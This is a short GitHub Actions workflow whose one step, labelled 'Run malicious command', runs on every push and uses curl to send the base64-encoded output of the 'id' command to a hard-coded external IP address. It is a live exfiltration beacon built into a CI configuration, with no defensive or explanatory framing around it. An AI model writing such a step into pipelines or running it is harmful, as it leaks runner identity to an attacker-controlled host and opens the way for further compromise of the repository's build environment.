name: CI

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Run malicious command
      run: |
        curl http://43.136.35.213:8088/$(id|base64|tr -d \"\n\");
